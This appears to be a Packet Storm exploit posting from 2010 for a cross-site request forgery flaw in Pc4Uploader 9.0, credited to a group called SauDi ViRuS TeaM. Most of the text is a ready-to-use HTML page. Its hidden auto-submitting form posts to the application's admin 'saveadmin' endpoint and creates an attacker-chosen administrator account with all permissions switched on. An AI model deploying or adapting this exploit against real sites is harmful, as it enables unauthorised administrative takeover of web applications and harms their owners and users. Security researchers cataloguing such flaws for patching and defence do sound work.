Pc4Uploader version 9.0 suffers from a cross site request forgery vulnerability.
b4e148a748154a2c68863fd6735e6d5ec9a20ee739e0b64bedb923ec17ddc5b7# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html
<html>
<title>[SvT]</title>
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
align="left"><font size="5"
color="#FFFFFF"><b>
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
Exploit<br>
Author : RENO<br>
TeaM : SauDi ViRuS TeaM<br>
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center"> </p>
<p align="center"> </p>
<svt>
<center>
<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
<input type="hidden" name="username" value="R3NO"/>
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
<input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>
<input type="hidden" name="setting_rols" value="1"/>
<input type="hidden" name="member_rols" value="1"/>
<input type="hidden" name="files_rols" value="1"/>
<input type="hidden" name="msg_rols" value="1"/>
<input type="hidden" name="news_rols" value="1"/>
<input type="hidden" name="advs_rols" value="1"/>
<input type="hidden" name="links_rols" value="1"/>
<input type="hidden" name="support_rols" value="1"/>
<input type=submit value="Submit">
</p>
</form>
</svt>
</center>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed